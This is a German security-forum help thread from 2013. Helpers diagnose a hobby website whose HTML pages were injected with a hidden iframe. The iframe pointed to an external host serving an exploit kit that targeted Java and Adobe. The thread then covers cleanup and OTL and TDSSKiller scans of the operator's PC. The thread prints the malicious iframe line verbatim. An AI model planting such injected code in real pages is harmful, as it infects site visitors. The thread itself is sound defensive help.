Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Homepage befallen? Kann doch nicht... (https://www.trojaner-board.de/131317-homepage-befallen.html)

MrVain712 20.02.2013 22:10

Homepage befallen? Kann doch nicht...
 
Hallo,

Ich stehe vor einem Rätsel.
Ich betreibe mit einigen Kollegen einen Online Eishockey Manager und wir haben seit einiger Zeit das Problem, das bei einigen Managern deren Virenprogramm (in den meisten Fällen antivir) beim Besuch unserer Homepage/Forum, Alarm schlägt.

Bei einem Mitglied hat sich sogar angeblich nach dem Besuch unserer Homepage etwas mit dem Namen "system progressive protection" installiert und er hat daraufhin wohl einen Großteil seiner Daten verloren...

Nur begreife ich das ganze nicht... Ich selber nutzte bis vergangenen Monat noch Kaspersky, welches NIE beim Besuch der Seite gemeckert hatte, auch wenn ich von der Arbeit aus die Seite aufgerufen habe, gab es nie Meldungen in der Art und dort nutzen wir Norton...
Auch bei einigen anderen Managern gab es nie solche Meldungen...
Darum kann ich das ganze nicht so recht glauben, das die Seite wirklich befallen ist..

Ich habe die Seite auch schon von Norton Safe Web scannen lassen, alles tadellos... Auch google sagt, die Seite ist frei von jeglicher Malware... Gleiche gilt für Websitedefender... auch dort wird mir gesagt, die Seite ist sauber...

Auch mein Hoster, sagt mir das diese keinerlei Meldungen erhalten haben... Wenn dem so wäre, wären die befallenen Dateien/Seiten auch schon längst gesperrt worden...


Ist es denn möglich, das der Befall sich nur auf bestimmte User auswirkt? Finde es halt nur komisch, das bei manchen das Virenprogramm meckert, einer sogar einen richtigen Befall hatte und die meisten überhaupt keine Probleme haben...


Und das die Virenprogramme hin und wieder meckern ist ja auch nicht ungewöhnlich... Google Chrome meckert bei mir hin und wieder auch, wenn ich mal eine Seite (z.B. Forenseite von meinem Fussballverein, meinem Lieblingsitaliener) aufrufe, diese sei Malware verseucht etc.



Könnt ihr mir weiterhelfen? Möchte nicht unnötig die Homepage platt machen...


mfg

Vain

markusg 20.02.2013 22:12

Hi ein paar der fundmeldungen hier währen interessant.
übrigens bei der Rogue gehen die Daten nicht verloren, der gute Mann soll sich mal hier melden.
die seite währe auch günstig.

MrVain712 20.02.2013 22:29

Also die Seite ist:
hxxp://www-tiger-area.com
und das Forum ist über:
hxxp://tiger-area.com/wbb3/
zu erreichen.

Also Fundmeldungen waren:
Web Attack Toolkit Website 8
Angreifender PC : Panelallegro.1110.pl

bei nem anderen ist die Seite gesperrt worden mit der Begründung "unsicheres Programm"

markusg 20.02.2013 22:30

die hier oder?
onlineeishockeymanager.de

MrVain712 20.02.2013 22:35

Zitat:

Zitat von markusg (Beitrag 1016222)
die hier oder?
onlineeishockeymanager.de

tiger-area.com

bzw. forum:

tiger-area.com/wbb3/

handball10 20.02.2013 23:10

Halli Hallo :)

die Frameset-Seite von tiger-area.com ist in jedem Fall verseucht!

Zum Schluss wird noch hinter dem schließenden HTML-Tag ein Inlineframe eingebunden:

Code:

<iframe src="hxxp://illadearousa.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
Der Inhalt des Frames bindet wiederum ein Inline-Frame ein, hinter welchem sich ein Exploit-Kit verbirgt...
Dessen Inhalt hab ich noch nicht so gerafft (very obfuscated :headbang: )- Fortsetzung folgt.

Am besten, du suchst in jedem Fall die gesamte Seite einmal durch.
Wer weiß, was da noch so rumschwirrt...

Einen schönen Abend noch :)

markusg 20.02.2013 23:20

hi
danke, währs möglich eine Kopie der Index.php zu bekommen?
bei
File-Upload.net - Ihr kostenloser File Hoster!
hochladen, link an mich als private nachicht.
ps von der
tiger-area.com

markusg 20.02.2013 23:23

@handball10
schön mal wieder von dir zu lesen :-)

MrVain712 20.02.2013 23:30

schonmal vielen dank euch beiden,

habe die index.php geschickt. jedoch vom forum. denn bei tiger-area.com ist die index ja eine .htm seite...
Hoffe das ist richtig so

Zitat:

Zitat von handball10 (Beitrag 1016252)
Halli Hallo :)

die Frameset-Seite von tiger-area.com ist in jedem Fall verseucht!

Zum Schluss wird noch hinter dem schließenden HTML-Tag ein Inlineframe eingebunden:

Code:

<iframe src="hxxp://illadearousa.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
Der Inhalt des Frames bindet wiederum ein Inline-Frame ein, hinter welchem sich ein Exploit-Kit verbirgt...
Dessen Inhalt hab ich noch nicht so gerafft (very obfuscated :headbang: )- Fortsetzung folgt.

Am besten, du suchst in jedem Fall die gesamte Seite einmal durch.
Wer weiß, was da noch so rumschwirrt...

Einen schönen Abend noch :)

Hmm wie kann ich die Seite denn überprüfen?
habe mir jetzt einfach mal die startseite runtergezogen, also die index.htm...
und jetzt meckert auch kaspersky bei mir und löscht die datei sofort...

markusg 20.02.2013 23:36

hi dann die index.html.

MrVain712 20.02.2013 23:40

problem ist, ich bekomme die nich heruntergeladen... kaspersky löscht die sofort ... oder kann ich da eine ausnahme setzen? also die datei erlauben?

markusg 20.02.2013 23:41

müsste sich kurzfristig deaktivieren lassen, versuch mal über rechtsklick auf das Symbol im Infobereich.

MrVain712 20.02.2013 23:46

hab dir die datei geschickt

markusg 20.02.2013 23:49

danke.
hast du backups deiner homepages? dann könnte man die einspielen, natürlich vorher schauen ob das frame eingebunden ist am ende der seite.

MrVain712 20.02.2013 23:52

das backup ist leider auch befallen...
Würd es denn reichen, wenn ich die frames aus allen seiten rauslösche? habs gerade mal testweise bei einer seite gemacht, jetzt bleibt kaspersky bei dieser ruhig

handball10 20.02.2013 23:54

Update:

Sämtliche Dateien .htm-Dateien (außer unten.htm) enthalten auch den Inline-Frame.

Eingebunden wird ein Exploit, welcher nach verwundbaren Java- und Adobe-Versionen sucht.
Also auch auf den genannten Seiten säubern!

handball10

markusg 20.02.2013 23:55

ich würd vorschlagen, alle Dateien laden, und mit kaspersky scannen, nichts löschen lassen, damit du erst mal siehst, welche Dateien betroffen sind.
ist das forum auf vVersion
3.1.7
ansonsten mal updatten.
welches cms wird für die hauptseite genutzt?

MrVain712 20.02.2013 23:59

Zitat:

Zitat von markusg (Beitrag 1016285)
ich würd vorschlagen, alle Dateien laden, und mit kaspersky scannen, nichts löschen lassen, damit du erst mal siehst, welche Dateien betroffen sind.
ist das forum auf vVersion
3.1.7
ansonsten mal updatten.
welches cms wird für die hauptseite genutzt?

Das Forum ist auf Version 3.1./.

Und für die Homepage nutzen wir Excel 2003, wegen der Formeln und Frontpage 2003

markusg 21.02.2013 00:00

hi, dann update das Forum mal auf 3.1.7 und trage dich für den Newsletter der firma ein damit du immer über neue Updates bescheid weist.
für die wichtigen Verzeichnisse htaccess schutz eingerichtet, währe zumindest ein guter anfang

MrVain712 21.02.2013 00:04

Zitat:

Zitat von markusg (Beitrag 1016289)
.
für die wichtigen Verzeichnisse htaccess schutz eingerichtet, währe zumindest ein guter anfang

Nicht wirklich... hab da so ziemlich gar keine Ahnung von :confused:

markusg 21.02.2013 00:07

ok, lad dir erst mal den inhalt der seiten runter und prüfe ihn mit kaspersky.
wie handball10 gesagt hatt, sind weitee unterseiten infiziert, liste steht oben, die öffnest du mit dem editor und scrolst nach unten, dann findest du die genannten zeilen und löschst sie.
und, als Seitenbetreiber sollte man sich schon mit dem auseinander setzen, was man da tut, denn so bringst du deine Nutzer evtl. in gefahr

MrVain712 21.02.2013 00:11

hmm ja gut dann schließe ich die seite am besten, dafür fehlen mir einfach die kenntnisse...
bin ja schon froh das forum allein installiert bekommen zu haben

markusg 21.02.2013 00:38

na, dass musst du natürlich wissen, aber es gibt häufig auch plugins etc die einem dabei unterstützen

MrVain712 21.02.2013 00:47

bedeutet htaccess nicht, das die seiten dann nur über ein passwort zu erreichen sind?
das möchte ich nämlich nicht, wenn dann soll die seite schon für die öffentlichkeit zu erreichen sein

Welche Auswirkungen hat eigentlich dieser iframe?

handball10 21.02.2013 10:28

Zitat:

Welche Auswirkungen hat eigentlich dieser iframe?
Dieser iframe in jeder der Seiten hat die Auswirkung, dass immer eine externe Seite eingebunden wird. In dieser läuft ein kleines Javascript, welches wiederum dafür sorgt, dass ein eine weitere Seite geöffnet wird. In dieser befindet sich nun ein Exploit, welcher versucht Sicherheitslücken auf dem PC zu finden (vorzugsweise Java und Adobe) und diese dann ausnutzt um den PC zu infizieren.
Wenn es schlecht läuft, sind schon ein paar deiner Besucher mit irgendeinem Müll infiziert!

zu htaccess:

Zitat:

bedeutet htaccess nicht, das die seiten dann nur über ein passwort zu erreichen sind?
Nicht unbedingt - kann man machen.
Du kannst einzelne Ordner und Dateien (bspw. welche, bei denen niemand einfach so drauf Zugreifen darf) schützen, sodass diese von "Außen" nicht aufgerufen werden können und der Server eine Fehlermeldung ausspuckt.
Nützlich bspw. System-php-Dateien vor dem direkten Zugriff zu schützen...

Hier etwas mehr darüber:
SELFHTML: Webserver/CGI / Webserver / .htaccess - Server-Reaktionen kontrollieren

Gruß
handball10

MrVain712 21.02.2013 10:54

Ich glaub dafür muss man Informatik studiert haben :-D
Würde es denn reichen, wenn ich alle Seiten mit einem passwort schutz versehen würde?
Denn die Seiten die wir mit einem solchen schutz versehen haben, sind nicht befallen.

Wäre zwar was umständlich wenn man nun beim Aufruf jeder Seite ein passwort eingeben muss, aber anders Krieg ich das wohl nicht hin

handball10 21.02.2013 11:18

Zitat:

Ich glaub dafür muss man Informatik studiert haben :-D
Nicht unbedingt ;)
Setze dich mit der Materie auseinander - hab ich anfangs auch so gemacht.

Zitat:

Würde es denn reichen, wenn ich alle Seiten mit einem passwort schutz versehen würde?
Kann man mal versuchen:
google nach ".htpasswd"

Damit kannst du Ordner nur mit Benutzername und Passwort aufrufbar machen.
Wenn die Dateien dann alle in dem Ordner und in Unterordnern sein sollten, dann müsste man das Passwort nur zu Beginn einmal eingeben. Ab dann läuft eine Session, die erst nach X Minuten/Stunden ohne Aktivität abläuft.

Viel Erfolg ;)

handball10

MrVain712 21.02.2013 11:47

Das mit den Passwörtern kann ich sogar :-D

Kann man denn nun abschließend sagen, das sich "nur" dieser schadhafte iframe auf der homepage befindet oder habt ihr noch weiteres gefunden?
Das Forum ist sauber?

MrVain712 22.02.2013 16:30

*hochschieb*

markusg 22.02.2013 17:13

das forum hat viele errors, habt ihr da drann rummgebastelt? update eingespielt?

MrVain712 22.02.2013 19:06

hmm also das forum ist noch recht frisch... also vor 4 wochen installiert... davor hatten wir noch wbb2...
Haben einige Plugins installiert und halt die ganzen beiträge, user etc. aus dem wbb2 importiert

markusg 22.02.2013 19:15

aber das neueste Update eingespielt?

MrVain712 22.02.2013 19:18

ja genau, die Version 3.1.7

markusg 22.02.2013 19:19

sehr gut. seite von den iframes bereinigt, hab grad kein testsystem online und kann die seite nicht besuchen.

MrVain712 22.02.2013 19:27

die iframes sind alle entfernt worden. 99 stück waren es insgesamt

Achja die Serverlog brachte auch erkenntnis darüber woher der zugriff kam.
Der Server wurde am 19.02. um 1.30 morgens von einer IP aus den USA bearbeitet, dort wurde an allen zugänglichen htm dateien die änderungen vorgenommen

markusg 22.02.2013 19:32

hatten sie login daten? dann is evtl. ein pc mit admin rechten befallen gewesen mit schadsoftware

MrVain712 22.02.2013 19:49

wir haben die Zugangsdaten zum Server geändert, ein Befall ist keiner bekannt

markusg 25.02.2013 17:39

bitte poste mal otl logs von deinem pc

Falls noch nicht vorhanden, lade Dir bitte OTL von Oldtimer herunter und speichere es auf Deinem Desktop
Code:

activex
netsvcs
msconfig
%SYSTEMDRIVE%\*.
%PROGRAMFILES%\*.exe
%LOCALAPPDATA%\*.exe
%systemroot%\*. /mp /s
C:\Windows\system32\*.tsp
/md5start
userinit.exe
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
ws2ifsl.sys
sceclt.dll
ntelogon.dll
winlogon.exe
logevent.dll
user32.DLL
explorer.exe
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
eNetHook.dll
ahcix86.sys
KR10N.sys
nvstor32.sys
ahcix86s.sys
/md5stop
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\system32\*.dll /lockedfiles
%USERPROFILE%\*.*
%USERPROFILE%\Local Settings\Temp\*.exe
%USERPROFILE%\Local Settings\Temp\*.dll
%USERPROFILE%\Application Data\*.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs
CREATERESTOREPOINT

  • Schliesse bitte nun alle Programme. (Wichtig)
  • Klicke nun bitte auf den Quick Scan Button.
  • Kopiere
    nun den Inhalt aus OTL.txt und Extra.txt hier in Deinen Thread

MrVain712 26.02.2013 16:35

hmm ich kann diese hier weder posten (da zu lang) noch hochladen (da zu groß)

hab dir ne PM geschickt

markusg 26.02.2013 17:49

dann packe sie.

MrVain712 26.02.2013 21:55

soo hoffe es klappt

markusg 26.02.2013 21:57

hi,
otl fix

Fixen mit OTL

  • Starte bitte die OTL.exe.
  • Kopiere nun den Inhalt aus der Codebox in die Textbox.

Code:

:OTL
O4 - HKLM..\Run: [UnlockerAssistant] "C:\Program Files (x86)\Unlocker\UnlockerAssistant.exe" File not found
IE - HKCU\..\URLSearchHook: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - No CLSID value found
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
O4 - HKLM..\Run: []  File not found
:files
:Commands
[emptytemp]

  • Solltest du deinen Benutzernamen z. B. durch "*****" unkenntlich gemacht haben, so füge an entsprechender Stelle deinen richtigen Benutzernamen ein. Andernfalls wird der Fix nicht funktionieren.
  • Schließe bitte nun alle Programme.
  • Klicke nun bitte auf den Fix Button.
  • OTL kann gegebenfalls einen Neustart verlangen. Bitte dies zulassen.
  • Nach dem Neustart findest Du ein Textdokument auf deinem Desktop.
    ( Auch zu finden unter C:\_OTL\MovedFiles\<Uhrzeit_Datum>.txt)
    Kopiere nun den Inhalt hier in Deinen Thread

MrVain712 26.02.2013 23:02

All processes killed
========== OTL ==========
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\UnlockerAssistant deleted successfully.
Registry value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks\\{81017EA9-9AA8-4A6A-9734-7AF40E7D593F} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{81017EA9-9AA8-4A6A-9734-7AF40E7D593F}\ not found.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670}\ not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\ deleted successfully.
========== FILES ==========
========== COMMANDS ==========

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 41620 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default.migrated

User: DefaultAppPool
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 41620 bytes

User: Mr.Vain
->Temp folder emptied: 2175650721 bytes
->Temporary Internet Files folder emptied: 204619255 bytes
->Java cache emptied: 1812925 bytes
->FireFox cache emptied: 390962893 bytes
->Google Chrome cache emptied: 315197274 bytes
->Apple Safari cache emptied: 1660928 bytes
->Flash cache emptied: 179518 bytes

User: Pascal

User: Public

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 16345100 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 128 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 2.963,00 mb


OTL by OldTimer - Version 3.2.69.0 log created on 02262013_224658

Files\Folders moved on Reboot...
C:\Users\Mr.Vain\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

markusg 26.02.2013 23:03

hi,
Downloade dir bitte TDSSKiller TDSSKiller.exe und speichere diese Datei auf dem Desktop
  • Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
  • Drücke Start Scan
  • Sollten infizierte Objekte gefunden werden, wähle keinesfalls Cure. Wähle Skip und klicke auf Continue.
    TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
    Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt
Poste den Inhalt bitte in jedem Fall hier in deinen Thread.

MrVain712 26.02.2013 23:15

23:12:17.0945 5128 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
23:12:18.0040 5128 ============================================================
23:12:18.0040 5128 Current date / time: 2013/02/26 23:12:18.0040
23:12:18.0040 5128 SystemInfo:
23:12:18.0040 5128
23:12:18.0040 5128 OS Version: 6.2.9200 ServicePack: 0.0
23:12:18.0040 5128 Product type: Workstation
23:12:18.0040 5128 ComputerName: MRVAIN-PC
23:12:18.0040 5128 UserName: Mr.Vain
23:12:18.0040 5128 Windows directory: C:\WINDOWS
23:12:18.0040 5128 System windows directory: C:\WINDOWS
23:12:18.0040 5128 Running under WOW64
23:12:18.0040 5128 Processor architecture: Intel x64
23:12:18.0040 5128 Number of processors: 6
23:12:18.0040 5128 Page size: 0x1000
23:12:18.0040 5128 Boot type: Normal boot
23:12:18.0040 5128 ============================================================
23:12:18.0580 5128 Drive \Device\Harddisk0\DR0 - Size: 0xE8E0DB6000 (931.51 Gb), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
23:12:18.0580 5128 Drive \Device\Harddisk1\DR1 - Size: 0xE8E0DB6000 (931.51 Gb), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
23:12:18.0583 5128 Drive \Device\Harddisk2\DR2 - Size: 0xE8E0DB6000 (931.51 Gb), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
23:12:18.0584 5128 Drive \Device\Harddisk3\DR3 - Size: 0x2740000 (0.04 Gb), SectorSize: 0x200, Cylinders: 0x5, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
23:12:18.0592 5128 ============================================================
23:12:18.0592 5128 \Device\Harddisk0\DR0:
23:12:18.0592 5128 MBR partitions:
23:12:18.0592 5128 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x3CDA77F0
23:12:18.0592 5128 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x3CDA8000, BlocksNum 0x3795D800
23:12:18.0592 5128 \Device\Harddisk1\DR1:
23:12:18.0593 5128 MBR partitions:
23:12:18.0593 5128 \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x74705800
23:12:18.0593 5128 \Device\Harddisk2\DR2:
23:12:18.0594 5128 MBR partitions:
23:12:18.0594 5128 \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x74705982
23:12:18.0594 5128 \Device\Harddisk3\DR3:
23:12:18.0598 5128 MBR partitions:
23:12:18.0598 5128 \Device\Harddisk3\DR3\Partition1: MBR, Type 0xB, StartLBA 0x3F, BlocksNum 0x13986
23:12:18.0598 5128 ============================================================
23:12:18.0632 5128 C: <-> \Device\Harddisk0\DR0\Partition1
23:12:18.0632 5128 D: <-> \Device\Harddisk1\DR1\Partition1
23:12:18.0703 5128 E: <-> \Device\Harddisk0\DR0\Partition2
23:12:18.0709 5128 G: <-> \Device\Harddisk2\DR2\Partition1
23:12:18.0721 5128 J: <-> \Device\Harddisk3\DR3\Partition1
23:12:18.0721 5128 ============================================================
23:12:18.0721 5128 Initialize success
23:12:18.0721 5128 ============================================================
23:13:07.0206 3596 ============================================================
23:13:07.0206 3596 Scan started
23:13:07.0206 3596 Mode: Manual; SigCheck; TDLFS;
23:13:07.0206 3596 ============================================================
23:13:07.0750 3596 ================ Scan system memory ========================
23:13:07.0750 3596 System memory - ok
23:13:07.0751 3596 ================ Scan services =============================
23:13:07.0935 3596 [ E890C46E4754F0DF51BAFCC8D2E07498 ] 1394ohci C:\WINDOWS\System32\drivers\1394ohci.sys
23:13:07.0972 3596 1394ohci - ok
23:13:07.0984 3596 [ 4F18D4C7EA14F11A7211F60D553C03DB ] 3ware C:\WINDOWS\system32\drivers\3ware.sys
23:13:07.0997 3596 3ware - ok
23:13:08.0037 3596 [ 975AABEB243B800C23626D6B652C5A9C ] ACPI C:\WINDOWS\system32\drivers\ACPI.sys
23:13:08.0054 3596 ACPI - ok
23:13:08.0070 3596 [ DC968C37822117E576B933F34A2D130C ] acpiex C:\WINDOWS\system32\Drivers\acpiex.sys
23:13:08.0080 3596 acpiex - ok
23:13:08.0094 3596 [ 0CA9F7C3A78227C21A0A7854E245CFB2 ] acpipagr C:\WINDOWS\System32\drivers\acpipagr.sys
23:13:08.0104 3596 acpipagr - ok
23:13:08.0120 3596 [ 8EB8DA03B142D3DD1EB9ED8107A76C43 ] AcpiPmi C:\WINDOWS\System32\drivers\acpipmi.sys
23:13:08.0134 3596 AcpiPmi - ok
23:13:08.0150 3596 [ CBCE725C5D86ABA7D2604E22951AA9B8 ] acpitime C:\WINDOWS\System32\drivers\acpitime.sys
23:13:08.0159 3596 acpitime - ok
23:13:08.0255 3596 [ 3927397AC60D943DAF8808AFFED582B7 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
23:13:08.0262 3596 AdobeARMservice - ok
23:13:08.0360 3596 [ 9942DC4CC265CDA00486504444EF521D ] AdobeFlashPlayerUpdateSvc C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
23:13:08.0370 3596 AdobeFlashPlayerUpdateSvc - ok
23:13:08.0403 3596 [ 93C6388592B99925C1D1576E465BC80F ] adp94xx C:\WINDOWS\system32\drivers\adp94xx.sys
23:13:08.0421 3596 adp94xx - ok
23:13:08.0436 3596 [ D27763E0247292654E7F7D16444C7C72 ] adpahci C:\WINDOWS\system32\drivers\adpahci.sys
23:13:08.0452 3596 adpahci - ok
23:13:08.0475 3596 [ 67B90070FF48F794AF19F9FCF0080D75 ] adpu320 C:\WINDOWS\system32\drivers\adpu320.sys
23:13:08.0488 3596 adpu320 - ok
23:13:08.0515 3596 [ 974AE60BF5B90E31412D93596C968E5B ] AeLookupSvc C:\WINDOWS\System32\aelupsvc.dll
23:13:08.0527 3596 AeLookupSvc - ok
23:13:08.0560 3596 [ 36D6A3201721558A8AFBCC09C2DA4C2C ] AFD C:\WINDOWS\system32\drivers\afd.sys
23:13:08.0576 3596 AFD - ok
23:13:08.0586 3596 [ 01590377A5AB19E792528C628A2A68F9 ] agp440 C:\WINDOWS\system32\drivers\agp440.sys
23:13:08.0596 3596 agp440 - ok
23:13:08.0630 3596 [ D1BE8E6E5B3AF23A4393AF1BF867977A ] ALG C:\WINDOWS\System32\alg.exe
23:13:08.0656 3596 ALG - ok
23:13:08.0689 3596 [ 025E8C755BE293E50854D26D1BBE5133 ] AllUserInstallAgent C:\WINDOWS\system32\AUInstallAgent.dll
23:13:08.0700 3596 AllUserInstallAgent - ok
23:13:08.0751 3596 AMD FUEL Service - ok
23:13:08.0782 3596 [ 5A81054B824004B1ECC04F0034A1CDF9 ] AmdK8 C:\WINDOWS\System32\drivers\amdk8.sys
23:13:08.0791 3596 AmdK8 - ok
23:13:08.0978 3596 [ 8DC532B5BF820E48194C6AFC8862FCBC ] amdkmdag C:\WINDOWS\system32\DRIVERS\atikmdag.sys
23:13:09.0135 3596 amdkmdag - ok
23:13:09.0178 3596 [ AA48FEABA50C2DED9C485DFDBA044E40 ] amdkmdap C:\WINDOWS\system32\DRIVERS\atikmpag.sys
23:13:09.0198 3596 amdkmdap - ok
23:13:09.0214 3596 [ B849D453E644FAB9BC8EF6DC8CA9C4C6 ] AmdPPM C:\WINDOWS\System32\drivers\amdppm.sys
23:13:09.0223 3596 AmdPPM - ok
23:13:09.0239 3596 [ 35A0EB5AECB0FA3C41A2FB514A562304 ] amdsata C:\WINDOWS\system32\drivers\amdsata.sys
23:13:09.0248 3596 amdsata - ok
23:13:09.0269 3596 [ 00452671904F5EE94B50BF0219C97164 ] amdsbs C:\WINDOWS\system32\drivers\amdsbs.sys
23:13:09.0282 3596 amdsbs - ok
23:13:09.0293 3596 [ EA3FFE53E92E59C87E3ECA9BEB20D9B7 ] amdxata C:\WINDOWS\system32\drivers\amdxata.sys
23:13:09.0302 3596 amdxata - ok
23:13:09.0325 3596 [ 5A528A540B1AEE8B1C77ED65094E8CDF ] AODDriver4.01 C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys
23:13:09.0338 3596 AODDriver4.01 - ok
23:13:09.0342 3596 [ 5A528A540B1AEE8B1C77ED65094E8CDF ] AODDriver4.2 C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys
23:13:09.0348 3596 AODDriver4.2 - ok
23:13:09.0407 3596 [ 823F34D1DEF120A657BB7529ABF4461F ] AppHostSvc C:\WINDOWS\system32\inetsrv\apphostsvc.dll
23:13:09.0416 3596 AppHostSvc - ok
23:13:09.0421 3596 [ 83B3682CE922FB0F415734B26D9D6233 ] AppID C:\WINDOWS\system32\drivers\appid.sys
23:13:09.0433 3596 AppID - ok
23:13:09.0446 3596 [ CE2BEAD7F31816FF0AC490D048C969F9 ] AppIDSvc C:\WINDOWS\System32\appidsvc.dll
23:13:09.0457 3596 AppIDSvc - ok
23:13:09.0473 3596 [ D64C4AFEE8277F35EF729A2B924666B0 ] Appinfo C:\WINDOWS\System32\appinfo.dll
23:13:09.0494 3596 Appinfo - ok
23:13:09.0565 3596 [ A5299D04ED225D64CF07A568A3E1BF8C ] Apple Mobile Device C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
23:13:09.0572 3596 Apple Mobile Device - ok
23:13:09.0588 3596 [ 2D14788C5D0836292BEB27BBE109BE56 ] AppMgmt C:\WINDOWS\System32\appmgmts.dll
23:13:09.0610 3596 AppMgmt - ok
23:13:09.0630 3596 [ E933401B392387F4BE34DE8BAF1722A7 ] arc C:\WINDOWS\system32\drivers\arc.sys
23:13:09.0640 3596 arc - ok
23:13:09.0660 3596 [ 07CA323EF2E8247A568AB0F3662AD644 ] arcsas C:\WINDOWS\system32\drivers\arcsas.sys
23:13:09.0671 3596 arcsas - ok
23:13:09.0782 3596 [ 108FB6DDB69E537A2EA53F425363FAE5 ] aspnet_state C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
23:13:09.0792 3596 aspnet_state - ok
23:13:09.0804 3596 [ 74DBAEC35366C4EE7670428808715A6A ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
23:13:09.0814 3596 AsyncMac - ok
23:13:09.0829 3596 [ A721FF570C2387E383BDDEA9632863C9 ] atapi C:\WINDOWS\system32\drivers\atapi.sys
23:13:09.0837 3596 atapi - ok
23:13:09.0845 3596 [ B0790FF0E25B7A2674296052F2162C1A ] AtiHDAudioService C:\WINDOWS\system32\drivers\AtihdW76.sys
23:13:09.0852 3596 AtiHDAudioService - ok
23:13:09.0874 3596 [ 2D648572BA9A610952FCAFBA1E119C2D ] AtiHdmiService C:\WINDOWS\system32\drivers\AtiHdmi.sys
23:13:09.0881 3596 AtiHdmiService - ok
23:13:09.0915 3596 [ 7C5D273E29DCC5505469B299C6F29163 ] AtiPcie C:\WINDOWS\system32\drivers\AtiPcie.sys
23:13:09.0921 3596 AtiPcie - ok
23:13:09.0953 3596 [ 810ED88782952228AF9C0985FB7D259E ] AudioEndpointBuilder C:\WINDOWS\System32\AudioEndpointBuilder.dll
23:13:09.0964 3596 AudioEndpointBuilder - ok
23:13:10.0002 3596 [ 25CA8B87479A374919563B3EE7136F32 ] Audiosrv C:\WINDOWS\System32\Audiosrv.dll
23:13:10.0020 3596 Audiosrv - ok
23:13:10.0069 3596 [ 587EFD6A3A30A35A27904D21AE1FB882 ] AVP C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\avp.exe
23:13:10.0080 3596 AVP - ok
23:13:10.0097 3596 [ 89491EF71D5EA011127832C588002853 ] AxInstSV C:\WINDOWS\System32\AxInstSV.dll
23:13:10.0107 3596 AxInstSV - ok
23:13:10.0140 3596 [ 87AB5BB072A3F128541D5B815F82FFDD ] b06bdrv C:\WINDOWS\system32\drivers\bxvbda.sys
23:13:10.0158 3596 b06bdrv - ok
23:13:10.0171 3596 [ 81703BC5D68DEDBB086C2368FBE7B334 ] BasicDisplay C:\WINDOWS\System32\drivers\BasicDisplay.sys
23:13:10.0180 3596 BasicDisplay - ok
